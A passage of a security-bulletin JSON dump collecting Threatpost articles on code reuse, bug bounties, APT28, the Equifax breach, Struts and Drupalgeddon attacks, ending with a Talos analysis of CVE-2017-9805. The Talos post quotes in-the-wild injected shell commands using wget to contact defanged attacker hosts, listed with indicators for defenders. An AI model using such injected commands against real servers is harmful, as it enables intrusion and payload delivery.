nipping the problem at the bud is the used of automated security vulnerability and configuration scanning for open source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\n[![nodejs](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs.png>)The Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. According to Node.js the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. \u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. A self-contained community hammers away at applications on these respective platforms and earn bounties for bugs that meet certain criteria.\n\n> Git Hub will double its maximum bug bounty payout to $10,000\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgithub-doubles-down-on-maximum-bug-bounty-payouts%2F110730%2F&text=Git+Hub+will+double+its+maximum+bug+bounty+payout+to+%2410%2C000>)\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that when combined with a zero day in Google\u2019s Chrome browser achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose it before a patch has been released and implemented. Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests to download a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote authors of the report Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce the foothold is established in the hotel\u2019s wi-fi system, hackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThat username and hashed password from hotel guests is cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. \u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They achieve this through adding the malicious JavasSript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31-1024x171.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31.png>)\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disc.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1-1024x137.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1.png>)\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2-300x103.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal webiste they can look for SQL injection vulnerabilities, executing DDoS attacks, distributing phishing email spam, and terminating any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidences adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organization are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string></blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string></blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\"><string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string></blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting 